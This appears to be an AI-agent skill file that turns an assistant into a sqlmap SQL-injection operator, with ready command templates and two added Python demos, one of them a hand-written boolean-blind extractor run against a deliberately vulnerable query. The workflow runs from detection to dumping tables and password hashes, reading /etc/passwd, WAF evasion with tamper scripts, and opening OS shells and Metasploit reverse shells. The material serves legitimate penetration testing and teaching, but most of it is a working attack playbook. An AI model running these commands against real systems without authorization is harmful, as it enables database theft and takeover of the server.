Hacktricks-skills sqlmap-assistant
SQLMap automation and SQL injection testing assistant. Use this skill whenever the user needs to test for SQL injection vulnerabilities, run SQLMap commands, extract database information, or perform web application security testing. Trigger on mentions of SQLMap, SQL injection, database exploitation, web security testing, penetration testing, or any request to audit web applications for database vulnerabilities.
Install from source: clone the upstream repo
git clone https://github.com/abelrguezr/hacktricks-skills
manifest: skills/pentesting-web/sql-injection/sqlmap/sqlmap/SKILL.MD
Source content:
SQLMap Assistant
A skill for automating SQL injection testing with SQLMap, generating commands, and guiding security assessments.
When to Use This Skill
Use this skill when:
- The user wants to test a web application for SQL injection vulnerabilities
- They need SQLMap command templates for specific scenarios
- They're doing penetration testing or security assessments
- They need help extracting database information from vulnerable applications
- They want to understand SQL injection techniques and payloads
- They're working with Burp Suite/ZAP captures for SQL injection testing
Quick Start
Basic SQLMap Command Template
```bash
sqlmap -u "<URL>" -p "<PARAMETER>" --batch --random-agent --threads=10 --level=5 --risk=3
```
Note that `--level=5 --risk=3` is sqlmap's most aggressive setting: it tests every injection place (including all headers) with every payload, and `--risk=3` adds OR-based tests that can modify data if the injection lands inside an UPDATE or DELETE statement. For a first pass prefer the defaults (`--level=1 --risk=1`) and raise them only when nothing is found.
From Request File (Burp/ZAP)
```bash
sqlmap -r <request_file.txt> --batch --random-agent
```
Common Testing Scenarios
1. GET Parameter Injection
```bash
sqlmap -u "http://target.com/page.php?id=1" -p id --batch
```
2. POST Data Injection
```bash
sqlmap -u "http://target.com/login" --data "username=admin&password=test" --batch
```
3. Cookie Injection (cookie values are only tested from `--level=2` upwards, so set it explicitly)
```bash
sqlmap -u "http://target.com" --cookie "session=abc123" --level=2 --batch
```
4. Header Injection (sqlmap tests User-Agent/Referer on its own from `--level=3`; any other header is only tested where you place the `*` injection marker)
```bash
sqlmap -u "http://target.com" --headers="X-Forwarded-For:127.0.0.1*" --batch
```
5. Custom HTTP Method
```bash
sqlmap --method=PUT -u "http://target.com/api" --headers="X-Custom-Header:*" --batch
```
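The scenarios above are what sqlmap derives by itself from a saved Burp/ZAP request when you pass `-r`. The following added example (written for this page, not part of the skill or of sqlmap) makes that derivation explicit: it parses a raw HTTP request, lists every parameter sqlmap could target and the injection place it lives in, and builds the equivalent explicit command line, including the minimum `--level` that place requires. The sample request, the host `target.example` and its parameters are constructed for the demo.

```python
"""Translate a saved Burp/ZAP request into an explicit sqlmap invocation.

Added example, not sqlmap's own code: sqlmap -r already does this internally.
The request below is constructed for the demo (host and parameters are made up).
"""
import shlex
from urllib.parse import parse_qsl, urlsplit

# Minimum --level at which sqlmap tests each injection place:
# GET/POST always, cookies from level 2, User-Agent/Referer from level 3, Host at 5.
# Any other header is only tested if it carries the * injection marker.
LEVEL_FOR_PLACE = {"GET": 1, "POST": 1, "Cookie": 2,
                   "User-Agent": 3, "Referer": 3, "Host": 5}

SAMPLE_REQUEST = (  # constructed sample, as Burp's "Copy to file" would save it
    "POST /login?ref=home HTTP/1.1\r\n"
    "Host: target.example\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Cookie: session=abc123; theme=dark\r\n"
    "X-Forwarded-For: 127.0.0.1\r\n"
    "\r\n"
    "username=admin&password=test"
)


def parse_request(raw):
    """Split a raw HTTP/1.1 request into (method, path, headers, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    method, path, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip()] = value.strip()
    return method, path, headers, body


def injection_places(method, path, headers, body):
    """Map each candidate parameter name to the place sqlmap would inject into."""
    places = {}
    for name, _ in parse_qsl(urlsplit(path).query, keep_blank_values=True):
        places[name] = "GET"
    if body:
        for name, _ in parse_qsl(body, keep_blank_values=True):
            places[name] = "POST"
    for cookie in headers.get("Cookie", "").split(";"):
        if "=" in cookie:
            places[cookie.split("=", 1)[0].strip()] = "Cookie"
    for header in ("User-Agent", "Referer", "Host"):
        if header in headers:
            places[header] = header
    return places


def build_sqlmap_argv(raw, target, scheme="http"):
    """Build the sqlmap argument list that tests `target` from a saved request."""
    method, path, headers, body = parse_request(raw)
    places = injection_places(method, path, headers, body)
    if target not in places:
        raise ValueError("%r is not a testable parameter in this request" % target)
    argv = ["sqlmap", "-u", "%s://%s%s" % (scheme, headers["Host"], path), "-p", target]
    if method not in ("GET", "POST"):     # sqlmap infers POST from --data
        argv.append("--method=" + method)
    if body:
        argv += ["--data", body]
    if "Cookie" in headers:
        argv += ["--cookie", headers["Cookie"]]
    extra = ["%s: %s" % (k, v) for k, v in headers.items()
             if k not in ("Host", "Cookie", "Content-Length")]
    if extra:                             # --headers takes newline-separated "Name: value"
        argv += ["--headers", "\n".join(extra)]
    argv += ["--level=%d" % LEVEL_FOR_PLACE[places[target]], "--batch"]
    return argv


if __name__ == "__main__":
    print(injection_places(*parse_request(SAMPLE_REQUEST)))
    for target in ("username", "session"):
        print(shlex.join(build_sqlmap_argv(SAMPLE_REQUEST, target)))
```

Targeting `session` yields `--level=2` while `username` stays at the default; that difference is the usual reason a cookie injection "is not found" by a plain `-r` run.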
Data Extraction Commands
Enumerate Databases
```bash
# List all databases
sqlmap -u "<URL>" -p "<PARAM>" --dbs --batch
# List tables in a specific database
sqlmap -u "<URL>" -p "<PARAM>" -D <database_name> --tables --batch
# List columns in a table
sqlmap -u "<URL>" -p "<PARAM>" -D <database_name> -T <table_name> --columns --batch
# Dump all data from a table
sqlmap -u "<URL>" -p "<PARAM>" -D <database_name> -T <table_name> --dump --batch
# Dump specific columns
sqlmap -u "<URL>" -p "<PARAM>" -D <database_name> -T <table_name> -C <column1,column2> --dump --batch
```
Extract User Information
```bash
# Get current database user
sqlmap -u "<URL>" -p "<PARAM>" --current-user --batch
# Check if user is DBA
sqlmap -u "<URL>" -p "<PARAM>" --is-dba --batch
# Get all usernames
sqlmap -u "<URL>" -p "<PARAM>" --users --batch
# Get user password hashes
sqlmap -u "<URL>" -p "<PARAM>" --passwords --batch
# Get user privileges
sqlmap -u "<URL>" -p "<PARAM>" --privileges --batch
# Get system hostname
sqlmap -u "<URL>" -p "<PARAM>" --hostname --batch
```
Dump Everything
```bash
sqlmap -u "<URL>" -p "<PARAM>" --all --batch
```
Advanced Techniques
Force Specific Injection Techniques
```bash
# Use only UNION and time-based blind
sqlmap -u "<URL>" -p "<PARAM>" --technique="UT" --batch
# Use only Boolean-based blind
sqlmap -u "<URL>" -p "<PARAM>" --technique="B" --batch
# Use only Error-based
sqlmap -u "<URL>" -p "<PARAM>" --technique="E" --batch
```
`--technique` only restricts which techniques are tried; sqlmap still tests them in its own fixed order, not in the order the letters are written.
Technique Reference (the default is all six, `BEUSTQ`):
| Letter | Technique | Description |
|---|---|---|
| B | Boolean-based blind | True/false conditions change the response |
| E | Error-based | Data leaks through DBMS error messages |
| U | UNION query | UNION SELECT appends attacker rows to the result |
| S | Stacked queries | Multiple SQL statements separated by `;` |
| T | Time-based blind | SLEEP/WAITFOR delays encode true/false |
| Q | Inline queries | Payload nested as a subquery inside the original statement |
Out-of-band retrieval (DNS exfiltration) is not a technique letter; it is enabled separately with `--dns-domain`.
Custom Prefix/Suffix
```bash
# Add prefix to injection point
sqlmap -u "<URL>" -p "<PARAM>" --prefix="') " --batch
# Add suffix to injection point
sqlmap -u "<URL>" -p "<PARAM>" --suffix="-- " --batch
# Both prefix and suffix
sqlmap -u "<URL>" -p "<PARAM>" --prefix="') " --suffix="-- " --batch
```
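To see what the technique table and the prefix/suffix options are about, here is an added example (written for this page; not code from the skill or from sqlmap) that performs boolean-based blind extraction (`--technique=B`) by hand against a deliberately vulnerable SQLite query of the shape `WHERE username = ('<input>')`. Closing that wrapper is exactly what `--prefix="') "` and `--suffix="-- "` do. The schema, the rows and the query shape are constructed for the demo; the parameterised `safe_lookup` shows the same oracle going flat once the input is bound instead of spliced.

```python
"""Boolean-based blind extraction by hand, as sqlmap does with
--technique=B --prefix="') " --suffix="-- ".  Added example with a constructed
SQLite schema; not part of the original skill or of sqlmap."""
import sqlite3

PREFIX = "') "    # closes the ('...') wrapper the vulnerable query puts around input
SUFFIX = " -- "   # comments out the closing quote/paren that follows our input
STATS = {"queries": 0}


def make_db():
    """Constructed sample schema and rows (not real data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)",
                     [(1, "admin", "s3cr3t!"), (2, "bob", "hunter2")])
    conn.commit()
    return conn


def vulnerable_lookup(conn, username):
    """Deliberately vulnerable: the input is spliced straight into the statement."""
    sql = "SELECT id FROM users WHERE username = ('%s')" % username
    return conn.execute(sql).fetchall()


def safe_lookup(conn, username):
    """Hardened form: the value travels as a bound parameter, never as SQL."""
    sql = "SELECT id FROM users WHERE username = (?)"
    return conn.execute(sql, (username,)).fetchall()


def oracle(conn, lookup, condition):
    """Boolean oracle: True iff the injected condition keeps the admin row in the
    result, i.e. "the page shows the user" versus "the page shows nothing"."""
    STATS["queries"] += 1
    payload = "admin" + PREFIX + "AND " + condition + SUFFIX
    return len(lookup(conn, payload)) > 0


def extract(conn, lookup, expr, max_len=32):
    """Recover the text value of a scalar SQL expression one character at a time,
    binary-searching each code point (about 7 oracle queries per character).
    ASCII only: the search space is 0..127.  Past the end of the string substr()
    yields '' and unicode('') is NULL, so every comparison is false and the
    search converges on 0, which terminates the loop."""
    out = []
    for pos in range(1, max_len + 1):
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            probe = "unicode(substr((%s), %d, 1)) > %d" % (expr, pos, mid)
            if oracle(conn, lookup, probe):
                lo = mid + 1
            else:
                hi = mid
        if lo == 0:
            break
        out.append(chr(lo))
    return "".join(out)


if __name__ == "__main__":
    db = make_db()
    secret = "SELECT password FROM users WHERE id = 1"
    print("vulnerable:", repr(extract(db, vulnerable_lookup, secret)), STATS)
    STATS["queries"] = 0
    print("parameterised:", repr(extract(db, safe_lookup, secret)), STATS)
```

The query counter is the reason sqlmap prefers UNION or error-based retrieval when they work: a blind technique costs several requests per character, and a time-based variant additionally waits out a SLEEP on every one of them.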
Tamper Scripts (WAF Bypass)
```bash
# Use a tamper script
sqlmap -u "<URL>" -p "<PARAM>" --tamper=apostrophemask.py --batch
# Multiple tampers (applied in the order given)
sqlmap -u "<URL>" -p "<PARAM>" --tamper=apostrophemask.py,base64encode.py --batch
```
Common Tamper Scripts:
- apostrophemask.py: replaces apostrophes with their UTF-8 full-width counterpart
- base64encode.py: Base64-encodes the whole payload
- chardoubleencode.py: double URL-encodes all characters of the payload
- space2comment.py: replaces spaces with `/**/` comments
- randomcase.py: random case for each keyword character
- unionalltounion.py: replaces UNION ALL SELECT with UNION SELECT
- versionedkeywords.py: wraps keywords in MySQL versioned comments (`/*!KEYWORD*/`)
Second Order Injection
```bash
sqlmap -r <request_file.txt> --dbms MySQL --second-order "http://target.com/reflective_page" --batch
```
Custom String Detection
```bash
# Text that appears in the page only when the injected condition is true
sqlmap -u "<URL>" -p "<PARAM>" --string="success" --batch
# Text that appears in the page only when the injected condition is false
sqlmap -u "<URL>" -p "<PARAM>" --not-string="error" --batch
```
Use these when sqlmap's automatic page comparison is confused by dynamic content; they give boolean-based blind detection a fixed true/false marker.
System Access
Execute OS Commands
```bash
# Run a specific command
sqlmap -u "<URL>" -p "<PARAM>" --os-cmd="whoami" --batch
# Interactive OS shell
sqlmap -u "<URL>" -p "<PARAM>" --os-shell --batch
# Drop reverse shell/meterpreter (requires Metasploit on the attacking host)
sqlmap -u "<URL>" -p "<PARAM>" --os-pwn --batch
```
These need more than an injection: on MySQL/PostgreSQL sqlmap has to upload a web stager into a writable document root (file-write privileges and a known path), on MSSQL it relies on xp_cmdshell, so check `--is-dba` and `--privileges` first.
Read Files
```bash
sqlmap -u "<URL>" -p "<PARAM>" --file-read=/etc/passwd --batch
```
Requires file-read privileges on the DBMS side (for example the MySQL FILE privilege).
Crawl and Auto-Exploit
```bash
sqlmap -u "http://target.com/" --crawl=1 --forms --random-agent --batch --threads=5 --level=5 --risk=3
```
Authentication Support
```bash
# HTTP Basic Auth
sqlmap -u "<URL>" -p "<PARAM>" --auth-type=Basic --auth-cred="user:pass" --batch
# HTTP Digest Auth
sqlmap -u "<URL>" -p "<PARAM>" --auth-type=Digest --auth-cred="user:pass" --batch
# HTTP NTLM Auth
sqlmap -u "<URL>" -p "<PARAM>" --auth-type=NTLM --auth-cred="user:pass" --batch
```
Proxy Configuration
```bash
# Use Burp Suite proxy
sqlmap -u "<URL>" -p "<PARAM>" --proxy=http://127.0.0.1:8080 --batch
# Use other proxy
sqlmap -u "<URL>" -p "<PARAM>" --proxy=http://proxy.example.com:8080 --batch
```
Performance and Aggression
```bash
# Maximum level and risk (aggressive)
sqlmap -u "<URL>" -p "<PARAM>" --level=5 --risk=3 --batch
# Increase threads
sqlmap -u "<URL>" -p "<PARAM>" --threads=10 --batch
# Random user agent
sqlmap -u "<URL>" -p "<PARAM>" --random-agent --batch
# Custom user agent
sqlmap -u "<URL>" -p "<PARAM>" --user-agent="Mozilla/5.0" --batch
```
Known Database and OS
```bash
# Specify known DBMS
sqlmap -u "<URL>" -p "<PARAM>" --dbms=MySQL --batch
# Specify known OS
sqlmap -u "<URL>" -p "<PARAM>" --os=Linux --batch
```
Python Eval (Advanced)
```bash
# Run Python code against the request parameters before each request is sent
sqlmap -u "<URL>" -p "<PARAM>" --eval "<python_code>" --batch
```
The code sees the request parameters as Python variables named after them and may reassign them; the typical use is a parameter that must be recomputed from the injected one (a hash, checksum or timestamp) so the server does not reject the tampered request.
Workflow Guide
Step 1: Initial Reconnaissance
- Identify the target URL and parameters
- Capture requests with Burp Suite or ZAP if needed
- Start with basic detection:
```bash
sqlmap -u "<URL>" -p "<PARAM>" --batch --random-agent
```
Step 2: Confirm Vulnerability
- If detected, enumerate databases:
```bash
sqlmap -u "<URL>" -p "<PARAM>" --dbs --batch
```
Step 3: Extract Data
- List tables and columns
- Dump sensitive data (usernames, passwords, etc.)
- Check for system access capabilities
Step 4: Escalation (if applicable)
- Try OS command execution
- Attempt file reading
- Consider reverse shell if appropriate
Important Notes
- Always have written authorization before testing any system
- Use `--batch` for non-interactive mode (accepts the default answer to every prompt)
- Start with lower `--level` and `--risk` values and increase them only if needed
- Use `--random-agent` so the default sqlmap User-Agent is not blocked outright (it does not hide the request pattern itself)
- Consider using a proxy (Burp Suite) for request inspection
- Document findings for reporting
Common Issues and Solutions
SQLMap Doesn't Detect Injection
- Try single techniques: `--technique="B"` or `--technique="T"`
- Add prefix/suffix to match how the query wraps the input: `--prefix="') " --suffix="-- "`
- Use tamper scripts: `--tamper=apostrophemask.py`
- Raise `--level` and `--risk` so more injection places and payloads are tried
- Test every technique explicitly: `--technique="BEUSTQ"` (this is the default set, so it only helps when an earlier run narrowed `--technique`)
WAF Blocking Requests
- Use tamper scripts
- Slow down: fewer threads, or add a delay between requests
- Use a proxy to inspect which requests are blocked and modify them
- Try different user agents
Slow Performance
- Increase threads: `--threads=10` (no help for time-based blind, where sqlmap falls back to a single thread)
- Specify the known DBMS to skip fingerprinting and irrelevant payloads: `--dbms=MySQL`
- Use `--batch` to skip prompts